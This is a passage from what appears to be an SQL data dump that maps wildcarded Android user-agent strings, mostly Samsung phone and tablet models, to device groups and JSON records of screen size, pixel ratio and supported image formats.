SAMSUNG SM-J337W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J400F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J400G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J400M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J415FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J415G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J530FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J530G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J600GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J610FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J610G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J701M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J701MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J710FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J710GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J710MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J720M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J727U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J730FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J730GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J737A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J737P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J737T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J737U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J810M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-J810Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-M205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-M205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":893,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-N960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-P580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-P585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-S367VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-S767VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-T590) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-T595) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG SM-T825Y) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-G891A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-G930AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-J327A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-J727A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SAMSUNG-SM-J727AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SC-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SC-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SC-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SC-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SC-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SC-04J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SCV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SCV36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SCV38) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SCV40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 